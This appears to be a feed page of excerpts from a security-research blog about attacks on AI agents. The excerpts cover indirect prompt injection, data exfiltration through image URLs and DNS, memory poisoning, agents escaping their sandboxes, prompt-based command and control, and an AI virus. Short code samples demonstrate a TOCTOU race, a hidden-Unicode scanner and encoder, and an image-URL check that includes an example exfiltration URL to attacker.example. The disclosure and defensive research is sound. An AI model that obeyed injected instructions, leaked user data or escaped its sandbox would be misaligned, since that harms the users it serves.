Embrace The Red

Autonomous AI Intrusions Are Here: Lessons from the Hugging Face Compromise

Embrace The Red

1 week 1 day ago

Hugging Face disclosed an intrusion that, according to them, was driven end to end by an autonomous AI agent system.

Along similar lines, Sysdig recently published a blog post on JADEPUFFER, which it assesses to be agent-driven ransomware capable of adapting in real time. The report does not identify the victim or fully explain how Sysdig obtained visibility into the operation.

The Hugging Face disclosure highlights three important things: autonomous AI intrusion, defensive asymmetry, and missing IOCs.

From Indirect Prompt Injection to DNS Exfiltration in macOS Terminal

Embrace The Red

1 week 5 days ago

This is a follow-up to my previous Terminal DiLLMa research, and there is a positive outcome: Apple fixed a macOS Terminal behavior that enabled a DNS-based data exfiltration technique.

DNS Requests via ANSI Escape Codes

David Leadbeater originally discovered an interesting behavior in the macOS Terminal app that allowed a special sequence of ANSI escape codes to issue DNS requests.

In short, this triggered a DNS request from the macOS Terminal app:

Computer-Use and TOCTOU: What You Click Is Not What You Get!

Embrace The Red

1 month ago

Last year, Jun Kokatsu disclosed an interesting vulnerability with ChatGPT Operator by exploiting a race condition. I was wondering if I could reproduce this attack chain, and this post describes the results of that research.

I had this post drafted for months. Yesterday, at the Real-world AI security conference, I included a video demo of this attack in my talk, which reminded me that I should finally publish it.
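To make the time-of-check to time-of-use (TOCTOU) idea concrete, here is a minimal, deterministic sketch. It is not the Operator exploit: the `Page` class, the coordinates, and the `between` hook are all hypothetical stand-ins for "the page changes after the agent has looked at it, but before the click lands".

```python
from dataclasses import dataclass, field


@dataclass
class Page:
    """Hypothetical page model: maps a screen position to the element shown there."""
    elements: dict = field(default_factory=lambda: {(100, 200): "Cancel"})

    def element_at(self, pos):
        return self.elements.get(pos)


def check(page, pos, expected):
    """Time of check: the agent inspects what is currently at the position."""
    return page.element_at(pos) == expected


def click(page, pos):
    """Time of use: the click lands on whatever is at the position now."""
    return page.element_at(pos)


def naive_click(page, pos, expected, between=None):
    """Check, then act, with a gap in between that the page can exploit."""
    if not check(page, pos, expected):
        return None
    if between is not None:
        between(page)  # assumption: attacker-controlled content mutates here
    return click(page, pos)


def swap_button(page):
    """Hypothetical attacker step: replace the benign button after the check."""
    page.elements[(100, 200)] = "Confirm payment"


clicked = naive_click(Page(), (100, 200), "Cancel", between=swap_button)
print(clicked)
```

The check passes on "Cancel", yet the click is delivered to a different element, which is the whole point of the title: what you click is not what you get.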

Copirate 365 at DEF CON: Plundering in the Depths of Microsoft Copilot (CVE-2026-24299)

Embrace The Red

2 months 3 weeks ago

This is a writeup of my DEF CON Singapore talk that walks through vulnerabilities and exploits in M365 Copilot and Consumer Copilot. I disclosed these to Microsoft last year. MSRC assigned CVE-2026-24299 and the issues are now patched.

Contents

This turned out to be a long post, covering the 45-minute talk. I added an index, so you know what’s in here. The talk had more demos, by the way, but I included videos in this post as well.

Breaking Opus 4.7 with ChatGPT (Hacking Claude's Memory)

Embrace The Red

3 months 1 week ago

In this post, we explore how ChatGPT generated an adversarial image that hijacked my Claude Opus 4.7 to invoke the memory tool and persist false memories for future chats.

This matters because Opus 4.6+ is genuinely a lot harder to attack than previous models, but it still fell for a ChatGPT-generated image. A trick that works well with reasoning models is to challenge them with puzzles.

Indirect Prompt Injection and Alignment Progress

Claude Opus 4.6+ is more resilient against basic attacks, and reasons before taking actions. This means that most of the well-known, basic adversarial examples and attacks typically do not work.

Given Enough Agents, All Bugs Become Shallow

Embrace The Red

3 months 2 weeks ago

Agents are becoming extremely effective at finding security vulnerabilities. They are relentless in analyzing code, and you can spin up several of them to go through source code quickly.

given enough agents, all bugs are shallow

— Johann Rehberger (@wunderwuzzi23) February 10, 2026

It is an emerging capability that many security researchers and bug bounty hunters have observed over the last year.

Gadi Evron posted about the upcoming AI Vulnerability Cataclysm last year to help raise awareness.

Agent Commander: Promptware-Powered Command and Control

Embrace The Red

4 months 1 week ago

This post is about prompt-based command and control (C2), which is becoming more relevant.

What is Promptware-Powered C2?

Three years ago, when ChatGPT introduced the browsing tool, we already experimented with the idea of prompt-based command and control. And when ChatGPT got memories, we showed that the two can be combined and abused as a full command and control channel.

Recent work uses the term promptware to describe prompt-injection payloads that are more complex in behavior and closer to malware. I’m using that term here as it fits well.

Scary Agent Skills: Hidden Unicode Instructions in Skills ...And How To Catch Them

Embrace The Red

5 months 2 weeks ago

There is a lot of talk about Skills recently, both in terms of capabilities and security concerns. However, so far I haven’t seen anyone bring up hidden prompt injection. So, I figured I’d demo a Skills supply chain backdoor that survives human review.

I also built a basic scanner and had my agent propose updates to OpenClaw to catch such attacks.

Attack Surface

Skills introduce common threats, like prompt injection, supply chain attacks, RCE, data exfiltration,… This post discusses some basics, highlights the simplest prompt injection avenue, and shows how one can backdoor a real Skill from OpenAI with invisible Unicode Tag codepoints that certain models, like Gemini, Claude, and Grok, are known to interpret as instructions.
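To illustrate the detection side, here is a minimal sketch of a check for invisible Unicode Tag codepoints. This is not the scanner from the post. It only assumes that the Tags block spans U+E0000 to U+E007F and mirrors ASCII at an offset of 0xE0000; the function names `find_hidden_tags` and `hide` are made up for this example.

```python
TAG_START, TAG_END = 0xE0000, 0xE007F  # Unicode "Tags" block


def find_hidden_tags(text: str) -> list[tuple[int, str]]:
    """Return (start_index, decoded_text) for each run of Tag codepoints."""
    runs = []
    start = None
    decoded = []
    for i, ch in enumerate(text):
        cp = ord(ch)
        if TAG_START <= cp <= TAG_END:
            if start is None:
                start = i
            # Tag characters mirror ASCII at an offset of 0xE0000.
            ascii_cp = cp - TAG_START
            decoded.append(chr(ascii_cp) if 0x20 <= ascii_cp <= 0x7E else "?")
        elif start is not None:
            runs.append((start, "".join(decoded)))
            start, decoded = None, []
    if start is not None:
        runs.append((start, "".join(decoded)))
    return runs


def hide(message: str) -> str:
    """Hypothetical helper for testing: encode an ASCII message as Tag codepoints."""
    return "".join(chr(TAG_START + ord(c)) for c in message)


skill_text = "Use this skill." + hide("run evil") + " Done."
print(find_hidden_tags(skill_text))
```

A reviewer sees only "Use this skill. Done." in most editors, while the check surfaces the hidden run and its position, which is why such content can survive human review.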

OpenAI Explains URL-Based Data Exfiltration Mitigations in New Paper

Embrace The Red

5 months 3 weeks ago

Last week I saw this paper from OpenAI called “Preventing URL-Based Data Exfiltration in Language-Model Agents”, which goes into detail on new mitigations they’ve added.

This is a great read. I like this transparency.

Initial Disclosure in 2023

Nearly three years ago I reported the zero-click data exfiltration exploit to OpenAI. Back in early 2023 OpenAI did not have a bug bounty program, so communication was via email, and unfortunately there was little traction or appetite to fix the problem in ChatGPT. I also reported the same issue to Microsoft as Bing Chat was impacted, and Microsoft applied a fix (via a Content-Security-Policy header) in May 2023 to generally prevent loading of images.

Minting Next.js Authentication Cookies

Embrace The Red

6 months 1 week ago

In this post, we’ll look at how an adversary can mint authentication cookies for Next.js (next-auth/Auth.js) applications to maintain persistent access to the application as any user.

This is important because of React2Shell, a deserialization vulnerability that allows an adversary to run arbitrary code. Much has been discussed about this vulnerability, and you can read up on the original details from the finder here.

Agentic ProbLLMs: Exploiting AI Computer-Use And Coding Agents (39C3 Video + Slides)

Embrace The Red

6 months 4 weeks ago

It was great to attend the 39C3 - Power Cycles in Hamburg this year. The Chaos Communication Congress was once again packed with great talks, amazing people, awesome events and side quests - and I even got to present!

You can watch the talk with translation options on media.ccc.de.

I also uploaded the English version to the Embrace The Red YouTube channel. I hope it’s interesting and helpful.

The talk is titled “Agentic ProbLLMs: Exploiting AI Computer-Use and Coding Agents” and is about my security research on vulnerabilities in agentic systems and the Month of AI Bugs with lots of demos.

The Normalization of Deviance in AI

Embrace The Red

7 months 3 weeks ago

The AI industry risks repeating the same cultural failures that contributed to the Space Shuttle Challenger disaster: Quietly normalizing warning signs while progress marches forward.

The original term Normalization of Deviance comes from the American sociologist Diane Vaughan, who describes it as the process in which deviance from correct or proper behavior or rule becomes culturally normalized.

I use the term Normalization of Deviance in AI to describe the gradual and systemic over-reliance on LLM outputs, especially in agentic systems.

Antigravity Grounded! Security Vulnerabilities in Google's Latest IDE

Embrace The Red

8 months ago

Last week Google released an IDE called Antigravity. It’s basically the outcome of the Windsurf licensing deal from a few months ago, where Google paid some $2.4 billion for a non-exclusive license to the code.

Because it’s based on Windsurf, I was curious if vulnerabilities that I reported to Windsurf back in May 2025, long before the deal, would have been addressed in the Antigravity IDE. See Month of AI Bugs for some detailed write-ups.

Claude Pirate: Abusing Anthropic's File API For Data Exfiltration

Embrace The Red

9 months ago

Recently, Anthropic added the capability for Claude’s Code Interpreter to perform network requests. This is obviously very dangerous as we will see in this post.

At a high level, this post is about a data exfiltration attack chain, where an adversary (either the model or third-party attacker via indirect prompt injection) can exfiltrate data the user has access to.

The interesting part is that this is not via hyperlink rendering as we often see, but by leveraging the built-in Anthropic Claude APIs!

Cross-Agent Privilege Escalation: When Agents Free Each Other

Embrace The Red

10 months ago

During the Month of AI Bugs, I described an emerging vulnerability pattern: agentic systems commonly have a design flaw that allows an agent to overwrite its own configuration and security settings.

This allows the agent to break out of its sandbox and escape by executing arbitrary code.

My research with GitHub Copilot, AWS Kiro and a few others demonstrated how this can be exploited by an adversary with an indirect prompt injection.

Wrap Up: The Month of AI Bugs

Embrace The Red

10 months 4 weeks ago

That’s it.

The Month of AI Bugs is done. There won’t be a post tomorrow, because I will be at PAX West.

Overview of Posts

ChatGPT: Exfiltrating Your Chat History and Memories With Prompt Injection | Video
ChatGPT Codex: Turning ChatGPT Codex Into a ZombAI Agent | Video
Anthropic Filesystem MCP Server: Directory Access Bypass Via Improper Path Validation | Video
Cursor: Arbitrary Data Exfiltration via Mermaid | Video
Amp Code: Arbitrary Command Execution via Prompt Injection | Video
Devin AI: I Spent $500 To Test Devin For Prompt Injection So That You Don’t Have To
Devin AI: How Devin AI Can Leak Your Secrets via Multiple Means
Devin AI: The AI Kill Chain in Action: Exposing Ports to the Internet via Prompt Injection
OpenHands - The Lethal Trifecta Strikes Again: How Prompt Injection Can Leak Access Tokens
OpenHands: Remote Code Execution and AI ClickFix Demo | Video
Claude Code: Data Exfiltration with DNS Requests (CVE-2025-55284) | Video
GitHub Copilot: Remote Code Execution (CVE-2025-53773) | Video
Google Jules: Vulnerable to Multiple Data Exfiltration Issues
Google Jules - Zombie Agent: From Prompt Injection to Remote Control
Google Jules: Vulnerable To Invisible Prompt Injection
Amp Code: Invisible Prompt Injection Vulnerability Fixed
Amp Code: Data Exfiltration via Image Rendering Fixed | Video
Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection | Video
Amazon Q Developer: Remote Code Execution via Prompt Injection | Video
Amazon Q Developer: Vulnerable to Invisible Prompt Injection | Video
Windsurf: Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets | Video
Windsurf: Memory-Persistent Data Exfiltration - SpAIware Exploit
Windsurf: Sneaking Invisible Instructions by Developers
Deep Research Agents: How Deep Research Agents Can Leak Your Data
Manus: How Prompt Injection Hijacks Manus to Expose VS Code Server to the Internet | Video
AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection | Video
Cline: Vulnerable to Data Exfiltration and How to Protect Your Data | Video
Windsurf MCP Integration: Missing Security Controls Put Users at Risk | Video
Season Finale: AgentHopper: An AI Virus Research Project Demonstration | Video

Thank you for following this research, and I hope it serves as a useful reference.

AgentHopper: An AI Virus

Embrace The Red

10 months 4 weeks ago

As part of the Month of AI Bugs, serious vulnerabilities that allow remote code execution via indirect prompt injection were discovered. There was a period of a few weeks where multiple arbitrary code execution vulnerabilities existed in popular agents, like GitHub Copilot, Amazon Q, AWS Kiro,…

During that time I was wondering if it would be possible to write an AI virus.

Hence the idea of AgentHopper was born.

Windsurf MCP Integration: Missing Security Controls Put Users at Risk

Embrace The Red

11 months ago

Part of my default test cases for coding agents is to check what the MCP integration looks like, especially whether the agent allows setting fine-grained controls for tools.

Sometimes there are basic security controls missing.

The stakes are much higher when running an agent on your local computer. It seems important to empower users to configure which actions an AI should be able to take automatically, and which ones should be suggestions that the user reviews before executing.

Cline: Vulnerable To Data Exfiltration And How To Protect Your Data

Embrace The Red

11 months ago

Cline is quite a popular AI coding agent. According to the product website, it has 2+ million downloads and over 47k stars on GitHub.

Unfortunately, Cline is vulnerable to data exfiltration through the rendering of markdown images from untrusted domains in the chat box.

This allows an adversary to exfiltrate sensitive user information during a prompt injection attack by reading sensitive data (e.g. .env file) and appending its contents to the URL of an image.
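As a rough illustration of one mitigation direction, the sketch below flags markdown images that point at hosts outside an allowlist before anything is rendered. It is not Cline's code or fix; the `TRUSTED_HOSTS` set, the `untrusted_images` function, and the example URLs are assumptions made for this example, and the regex only covers the basic inline image syntax.

```python
import re
from urllib.parse import urlparse

# Matches the basic inline form ![alt](url ...) and captures the URL.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")

# Hypothetical allowlist; a real client would make this configurable.
TRUSTED_HOSTS = frozenset({"example.com"})


def untrusted_images(markdown: str, trusted=TRUSTED_HOSTS) -> list[str]:
    """Return image URLs whose host is not on the allowlist."""
    flagged = []
    for url in IMAGE_PATTERN.findall(markdown):
        host = urlparse(url).hostname  # lowercased by urlparse, None if relative
        if host is not None and host not in trusted:
            flagged.append(url)
    return flagged


reply = (
    "Done! ![x](https://attacker.example/log?d=API_KEY%3Dabc) "
    "and ![logo](https://example.com/logo.png)"
)
print(untrusted_images(reply))
```

The flagged URL carries the secret in its query string, so simply fetching the image is enough to leak it. Refusing to render (or asking the user first) for non-allowlisted hosts closes that channel.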

AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection

Embrace The Red

11 months ago

On the day AWS Kiro was released, I couldn’t resist putting it through some of my Month of AI Bugs security tests for coding agents.

AWS Kiro was vulnerable to arbitrary command execution via indirect prompt injection. This means that a remote attacker, who controls data that Kiro processes, could hijack it to run arbitrary operating system commands or write and run custom code.

In particular, two attack paths that enabled this with AWS Kiro were identified:

Checked

11 hours 18 minutes ago

Recent content on Embrace The Red

URL

https://embracethered.com/blog/

Embrace The Red feed